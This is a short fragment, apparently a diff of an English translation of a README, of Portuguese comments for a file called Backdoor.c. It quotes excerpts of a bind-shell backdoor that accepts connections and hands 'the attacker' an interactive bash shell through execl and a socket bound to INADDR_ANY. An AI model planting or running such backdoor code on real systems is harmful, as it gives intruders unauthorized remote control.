NoNameError/Backdoor.c/README_eng_us.txt

 }

- --Aceita as conexoes e disponibiliza a shell para o invasor obter o controle remoto do sistema novamente.
+ --Accept conections and provides the shell for the attacker

 # 7

     execl("/bin/bash","bash","-i", (char *)0);
     close(Novosocket);
     exit(0);
--- execuçao da shell para o atacante
+-- exec the shell

 # 8

  local.sin_addr.s_addr = INADDR_ANY;
-  --define o endereço local a ser usado.
+  --define the local addrs